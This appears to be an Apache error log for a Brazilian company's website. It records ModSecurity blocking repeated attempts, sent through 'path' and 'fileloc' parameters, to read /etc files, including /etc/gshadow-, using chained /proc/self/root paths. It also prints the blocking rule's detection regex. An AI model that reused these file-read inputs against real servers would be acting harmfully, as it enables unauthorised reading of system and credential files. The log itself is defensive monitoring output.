https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:49.558449 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:52510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwHew_le52K8_3pV12GgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:51.140502 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54042] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:21:53.799874 2026] [:error] [pid 29151:tid 140411699963648] [client 74.7.241.31:52516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwIfPqhzTj3BvfDX-yUgAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:56.967883 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:52524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwJNY0UrI5A3LftIwpBgAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:58.302239 2026] [:error] [pid 29151:tid 140411607643904] [client 74.7.241.31:38662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwJvPqhzTj3BvfDX-yVAAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:59.907811 2026] [:error] [pid 29151:tid 140411683178240] [client 74.7.241.31:38662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwJ_PqhzTj3BvfDX-yVgAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:22:01.069285 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:38666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwKdY0UrI5A3LftIwpEwAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:22:13.125804 2026] [proxy_fcgi:error] [pid 25836:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54682] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:22:36.138796 2026] [proxy_fcgi:error] [pid 2598:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55368] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:22:38.206379 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:37984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwTtY0UrI5A3LftIwpKgAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:22:45.288924 2026] [mime_magic:error] [pid 31803:tid 140411616036608] (70014)End of file found: [client 74.7.243.128:48624] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/systemd/user
[Tue Mar 17 21:22:58.093856 2026] [proxy_fcgi:error] [pid 29151:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56100] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:23:20.105917 2026] [proxy_fcgi:error] [pid 6296:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:56956] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:23:22.874313 2026] [mime_magic:error] [pid 6296:tid 140411582465792] (70014)End of file found: [client 216.73.216.191:52499] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 21:23:23.933790 2026] [:error] [pid 11088:tid 140411540502272] [client 74.7.244.43:37776] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnwe2mqtCojLHvu5cKSrAAAAJg"]
[Tue Mar 17 21:23:29.444671 2026] [:error] [pid 17651:tid 140411548894976] [client 74.7.228.61:48752] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnwgRCK1qEtjsNwJhzPXAAAABc"]
[Tue Mar 17 21:23:42.149830 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57788] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:24:04.141788 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58598] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:24:26.129811 2026] [proxy_fcgi:error] [pid 25836:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59302] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:24:48.125799 2026] [proxy_fcgi:error] [pid 25836:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59962] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:25:10.045827 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60662] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:25:32.575149 2026] [:error] [pid 19507:tid 140411632822016] [client 216.73.216.191:1266] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnw_NY0UrI5A3LftIwpcQAAAY0"]
[Tue Mar 17 21:25:33.138337 2026] [proxy_fcgi:error] [pid 2598:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33132] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:25:55.129793 2026] [proxy_fcgi:error] [pid 6296:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33930] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:26:02.604965 2026] [:error] [pid 17972:tid 140411699963648] [client 74.7.243.128:50858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnxGoZ5-GlpYjVrXCrfZQAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:26:17.125121 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34774] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:26:39.465841 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35692] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:26:46.083487 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:40016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnxRgkwaGbbGflqUZCtwQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Tue Mar 17 21:26:48.615958 2026] [mime_magic:error] [pid 6296:tid 140411716749056] (70014)End of file found: [client 74.7.241.31:32792] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/firewalld
[Tue Mar 17 21:27:01.125822 2026] [proxy_fcgi:error] [pid 6296:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36658] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:27:04.244246 2026] [:error] [pid 29151:tid 140411674785536] [client 216.73.216.191:63817] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnxWPPqhzTj3BvfDX-yrAAAAcg"]
[Tue Mar 17 21:27:09.840500 2026] [:error] [pid 2598:tid 140411699963648] [client 216.73.216.191:43877] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnxXRj0p0SRWAqcjGGjdAAAAwU"]
[Tue Mar 17 21:27:23.129816 2026] [proxy_fcgi:error] [pid 25836:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37516] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:27:42.803285 2026] [:error] [pid 18211:tid 140411716749056] [client 216.73.216.191:5376] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnxfhcIZFNFgEhGGCRBdQAAA8M"]
[Tue Mar 17 21:27:46.125778 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38332] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:28:07.117800 2026] [proxy_fcgi:error] [pid 6296:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38902] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:28:22.817961 2026] [:error] [pid 17887:tid 140411708356352] [client 216.73.216.191:22828] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnxpgkwaGbbGflqUZCt0wAAAMQ"]
[Tue Mar 17 21:28:25.362061 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.244.43:57202] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnxqXIk7brgkOH-rIW27wAAAUo"]
[Tue Mar 17 21:28:30.110009 2026] [proxy_fcgi:error] [pid 17651:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39518] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:28:32.874615 2026] [:error] [pid 18211:tid 140411607643904] [client 74.7.228.61:57582] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnxsBcIZFNFgEhGGCRBfAAAA9A"]
[Tue Mar 17 21:28:39.451605 2026] [mime_magic:error] [pid 11088:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:3642] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 21:28:39.451808 2026] [access_compat:error] [pid 11088:tid 140411649607424] [client 216.73.216.191:3642] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Tue Mar 17 21:28:51.133813 2026] [proxy_fcgi:error] [pid 18057:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39946] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:29:13.689771 2026] [proxy_fcgi:error] [pid 29151:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40670] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:29:27.776998 2026] [mime_magic:error] [pid 17653:tid 140411691570944] (70014)End of file found: [client 74.7.243.128:59580] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/systemd
[Tue Mar 17 21:29:28.834124 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:42050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnx6Mdf6f5d65gmYZRnuwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Tue Mar 17 21:29:31.345638 2026] [:error] [pid 11088:tid 140411548894976] [client 74.7.241.31:52812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnx62mqtCojLHvu5cKTOgAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:29:36.713841 2026] [proxy_fcgi:error] [pid 11816:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41326] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:29:40.304408 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.241.31:36426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnx9HIk7brgkOH-rIW2_gAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
